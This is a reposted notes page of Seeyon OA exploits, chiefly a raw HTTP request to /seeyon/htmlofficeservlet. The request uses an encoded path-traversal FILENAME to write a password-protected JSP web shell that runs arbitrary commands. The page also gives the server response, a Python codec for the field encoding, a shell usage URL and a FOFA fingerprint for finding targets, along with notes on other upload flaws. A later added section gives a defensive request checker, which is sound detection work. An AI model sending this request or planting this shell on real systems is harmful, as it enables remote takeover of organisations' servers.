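Seeyon OA (致远OA)
Seeyon A8-V5 Collaborative Management Software V6.1sp1
Seeyon A8+ Collaborative Management Software V7.0, V7.0sp1, V7.0sp2, V7.0sp3
Seeyon A8+ Collaborative Management Software V7.1
Vulnerability fingerprint (FOFA): app=“用友-致远OA” “seeyon”
https://www.cnblogs.com/flashine/articles/14325665.html (reproduction)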
https://www.cnblogs.com/nul1/p/12803555.html
/seeyon/htmlofficeservlet
EXP
POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length:1121
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache
DBSTEP V3.03550666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66<%@ page language="java"import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!publicstatic String excuteCmd(String c){StringBuilder line =newStringBuilder();try{Process pro = Runtime.getRuntime().exec(c);BufferedReader buf =newBufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while((temp = buf.readLine())!= null){line.append(temp+"\n");}buf.close();}catch(Exception e){line.append(e.getMessage());}return line.toString();}%><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
Response
DBSTEP V3.03860666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6<%@ page language="java"import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!publicstatic String excuteCmd(String c){StringBuilder line =newStringBuilder();try{Process pro = Runtime.getRuntime().exec(c);BufferedReader buf =newBufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while((temp = buf.readLine())!= null){line.append(temp+"\n");}buf.close();}catch(Exception e){line.append(e.getMessage());}return line.toString();}%><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp
import base64

# a: standard Base64 alphabet; b: substituted alphabet used for the DBSTEP field values
a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out = ""
# Menu: 1 = encode, 2 = decode, 0 = quit
c = input("\n1.加密 2.解密 0.退出\n\n请选择处理方式:")
while c != 0:
    out = ""
    if c == 1:
        # Encode: standard Base64 first, then substitute each character a -> b
        str = raw_input("\n请输入要处理的字符串:")
        str = base64.b64encode(str)
        for i in str:
            out += b[a.index(i)]
        print("\n处理结果为:" + out)
    elif c == 2:
        # Decode: substitute each character b -> a, then standard Base64 decode
        str = raw_input("\n请输入要处理的字符串:")
        for i in str:
            out += a[b.index(i)]
        out = base64.b64decode(out)
        print("\n处理结果为:" + out)
    else:
        # Invalid choice: only 1 and 2 are accepted
        print("\n输入有误!!只能输入“1”和“2”,请重试!")
    c = input("\n1.加密 2.解密 0.退出\n\n请选择处理方式:")
HTTP/1.1 200 OK
Date: Sat, 16 Apr 2022 13:01:42 GMT
Connection: close
Server: Seeyon-Server/1.0
Content-Length: 1116
DBSTEP V3.03860666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLKhqUwAqUKEwfuXwiC6
<%@ page language="java"import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!publicstatic String excuteCmd(String c){StringBuilder line =newStringBuilder();try{Process pro = Runtime.getRuntime().exec(c);BufferedReader buf =newBufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while((temp = buf.readLine())!= null){line.append(temp+"\n");}buf.close();}catch(Exception e){line.append(e.getMessage());}return line.toString();}%><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/
https://blog.csdn.net/xd_2021/article/details/122232463
Seeyon OA: the login form is affected by the Log4j2 vulnerability
请输入要处理的字符串:qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
b'..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp'
test123456.jsp?pwd=asasd3344&cmd=ipconfig
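Added example (not part of the original post): a defender-side check that decodes the DBSTEP fields of a captured request body sent to /seeyon/htmlofficeservlet, using the alphabet from the script above, and flags a FILENAME that leaves the upload directory or names a JSP file. The function names and the sample body are assumptions constructed for illustration; the encoded field values are the ones shown on this page.

```python
import base64
import re

# Alphabets copied from the codec script on this page.
STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
CUSTOM = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
TO_STD = str.maketrans(CUSTOM, STD)
FIELD_RE = re.compile(r"^(\w+)=([A-Za-z0-9+/=]+)", re.M)

# Constructed sample: field values as shown on this page, JSP payload
# replaced by a harmless page directive.
SAMPLE_BODY = """OPTION=S3WYOSWLBSGr
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
<%@ page language="java" %>
"""


def decode_value(value):
    """Undo the alphabet substitution, then Base64-decode; None if not decodable."""
    try:
        raw = base64.b64decode(value.translate(TO_STD), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", "replace")


def inspect_dbstep(body):
    """Return (decoded fields, findings) for one captured request body."""
    fields = {}
    for name, value in FIELD_RE.findall(body):
        fields.setdefault(name, decode_value(value))  # first occurrence wins
    findings = []
    filename = fields.get("FILENAME") or ""
    if ".." in re.split(r"[\\/]", filename):
        findings.append("FILENAME escapes the upload directory")
    if filename.lower().endswith((".jsp", ".jspx")):
        findings.append("FILENAME is a server-side script")
    if re.search(r"<%[@!=]?", body):
        findings.append("body contains JSP markup")
    return fields, findings


if __name__ == "__main__":
    decoded, alerts = inspect_dbstep(SAMPLE_BODY)
    print(decoded["FILENAME"])
    for alert in alerts:
        print("ALERT:", alert)
```

Run it over request bodies captured by a reverse proxy or WAF; any finding on this endpoint is worth an alert, since the decoded FILENAME shows where the servlet was asked to write.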
Seeyon A8-V5 Collaborative Management Software V6.1SP2
v6.1 sp2
.A6 V7.1SP1
Upload vulnerability
https://www.cnblogs.com/bonelee/p/15160660.html
https://blog.csdn.net/weixin_43227251/article/details/115616761
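Seeyon A8+ V7.1
Disclosure date: 2021-06-03
Vulnerability ID: CNVD-2021-32773
Severity: High
Description: Seeyon A8+ Collaborative Management Software has a command execution vulnerability
Beijing Seeyon Internet Software Co., Ltd. (北京致远互联软件股份有限公司) Seeyon A8+ Collaborative Management Software V7.0
Beijing Seeyon Internet Software Co., Ltd. Seeyon A8+ Collaborative Management Software V7.0sp1
Beijing Seeyon Internet Software Co., Ltd. Seeyon A8+ Collaborative Management Software V7.0sp2
Beijing Seeyon Internet Software Co., Ltd. Seeyon A8+ Collaborative Management Software V7.0sp3
Beijing Seeyon Internet Software Co., Ltd. Seeyon A8+ Collaborative Management Software V7.1
Remote arbitrary file upload vulnerability
Seeyon A8-V5 Collaborative Management Software V6.1sp1
Seeyon A8+ Collaborative Management Software V7.0, V7.0sp1, V7.0sp2, V7.0sp3
Seeyon A8+ Collaborative Management Software V7.1
A6 employee sensitive information disclosure: https://blog.csdn.net/qq_42660246/article/details/116176625
Copyright belongs to the original author amingMM. If there is any infringement, please contact us for removal.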